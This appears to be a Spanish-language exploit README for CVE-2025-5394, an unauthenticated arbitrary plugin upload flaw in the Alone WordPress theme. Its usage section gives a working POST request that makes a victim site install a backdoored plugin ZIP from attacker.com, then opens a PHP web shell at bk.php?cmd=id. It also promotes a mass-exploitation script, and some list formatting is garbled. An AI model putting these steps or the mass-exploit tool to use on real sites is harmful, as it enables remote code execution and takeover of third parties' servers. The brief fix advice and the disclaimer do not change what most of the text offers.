
Alone – Tema WordPress multipropósito para organizaciones benéficas sin fines de lucro <= 7.8.3 - Falta de autorización que permite subida arbitraria de archivos no autenticada a través de la instalación de plugins.
🔥 Resumen de la Vulnerabilidad
El tema de WordPress Alone versiones <= 7.8.3 es vulnerable a una vulnerabilidad de carga arbitraria de archivos no autenticada. Esta falla permite a atacantes no autenticados cargar e instalar archivos ZIP de plugins arbitrarios desde URLs remotas a través de un endpoint AJAX desprotegido, lo que resulta en ejecución remota de código (RCE) mediante la implementación de plugins con puerta trasera.
Esta vulnerabilidad se origina en la función beplus_import_pack_install_plugin expuesta al público a través de wp_ajax_nopriv_ sin ninguna verificación de autenticación o capacidad. La función instala y activa un plugin desde una URL proporcionada por el usuario.
🔍 Tema Afectado
🧪 Características del Exploit
/wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin🧠 Investigador
🚀 Uso
Prepare un archivo ZIP de plugin malicioso alojado en un servidor que usted controle.
Plugin Name:) y una puerta trasera PHP (por ejemplo, bk.php)Prepare la siguiente solicitud POST:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
action=beplus_import_pack_install_plugin&
data[plugin_slug]=hello-dolly&
data[plugin_source]=https://attacker.com/hello-dolly.zip
Si tiene éxito, el plugin se instala y activa. Acceda a su shell en:
https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
🧰 Script de Explotación Masiva Este repositorio incluye una herramienta de explotación masiva con:
result.txtConsulte mass_beplus_exploit.py para más detalles.
🛠 Recomendaciones de Corrección
wp_ajax_nopriv_beplus_import_pack_install_plugin.current_user_can('install_plugins'))🔒 Descargo de responsabilidad:
Esta información se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El acceso o uso no autorizado de sistemas informáticos es ilegal y poco ético.
📚 Referencia:
CVE: CVE-2025-5394
Investigador: Thai An